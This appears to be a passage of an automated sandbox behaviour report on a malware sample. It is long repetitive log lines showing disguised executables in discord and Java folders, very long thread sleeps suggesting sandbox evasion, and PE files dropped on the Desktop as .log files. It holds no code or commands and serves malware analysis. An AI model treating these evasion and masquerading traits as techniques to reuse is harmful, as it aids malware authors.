                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeMemory allocated: 9B0000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeMemory allocated: 1A5E0000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeMemory allocated: 10C0000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeMemory allocated: 1AB60000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeMemory allocated: 1360000 memory reserve | memory write watch
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeMemory allocated: 1B000000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeMemory allocated: 2590000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeMemory allocated: 1A760000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeMemory allocated: D90000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeMemory allocated: 1A9E0000 memory reserve | memory write watch
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeMemory allocated: 970000 memory reserve | memory write watch
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeMemory allocated: 1A3E0000 memory reserve | memory write watch
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 600000
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 599875
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 599500
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 599235
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 599000
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 598891
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 598778
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 598641
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 3600000
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 598499
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 598360
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 300000
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 597969
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 597857
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 597688
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 597563
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 597406
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 597235
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 597123
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 596953
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 596828
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 596715
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 596605
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 596500
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 596390
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 596281
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 596167
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 596047
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 595938
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 595828
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 595719
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 595609
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 595500
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 595391
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 595266
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 595156
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 595047
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 594937
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 594827
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 594717
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 594608
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 594500
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 594391
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 594229
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 593323
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 593169
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 593062
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 592953
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 592833
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 592703
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 592591
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 592483
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 592374
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 592266
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 592156
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 592047
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWindow / User API: threadDelayed 2808
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWindow / User API: threadDelayed 6919
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeDropped PE file which has not been started: C:\Users\user\Desktop\GoOOBNnj.logJump to dropped file
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeDropped PE file which has not been started: C:\Users\user\Desktop\XeElcNfe.logJump to dropped file
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeDropped PE file which has not been started: C:\Users\user\Desktop\IlqWXNCe.logJump to dropped file
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeDropped PE file which has not been started: C:\Users\user\Desktop\HBUOKBdR.logJump to dropped file
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeDropped PE file which has not been started: C:\Users\user\Desktop\ToOuVQfl.logJump to dropped file
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeDropped PE file which has not been started: C:\Users\user\Desktop\ebskEcaT.logJump to dropped file
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeDropped PE file which has not been started: C:\Users\user\Desktop\QPyLHGSL.logJump to dropped file
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeDropped PE file which has not been started: C:\Users\user\Desktop\axSbriXt.logJump to dropped file
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe TID: 5572Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe TID: 7428Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe TID: 7528Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7536Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7452Thread sleep time: -30000s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -29514790517935264s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -600000s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -599875s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -599500s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -599235s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -599000s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -598891s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -598778s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -598641s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7644Thread sleep time: -3600000s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -598499s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -598360s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7644Thread sleep time: -300000s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -597969s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -597857s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -597688s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -597563s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -597406s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -597235s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -597123s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -596953s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -596828s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -596715s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -596605s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -596500s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -596390s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -596281s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -596167s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -596047s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -595938s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -595828s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -595719s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -595609s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -595500s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -595391s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -595266s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -595156s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -595047s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -594937s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -594827s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -594717s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -594608s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -594500s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -594391s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -594229s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -593323s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -593169s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -593062s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -592953s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -592833s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -592703s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -592591s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -592483s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -592374s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -592266s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -592156s >= -30000s
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7660Thread sleep time: -592047s >= -30000s
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe TID: 7600Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeCode function: 0_2_0058A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0058A69B
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeCode function: 0_2_0059C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0059C220
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeCode function: 0_2_0059E6A3 VirtualQuery,GetSystemInfo,0_2_0059E6A3
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 30000
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 600000
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 599875
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 599500
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 599235
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 599000
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 598891
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 598778
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 598641
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 3600000
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 598499
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 598360
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 300000
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 597969
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 597857
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 597688
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 597563
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 597406
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 597235
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 597123
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 596953
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 596828
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 596715
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 596605
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 596500
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 596390
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 596281
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 596167
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 596047
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 595938
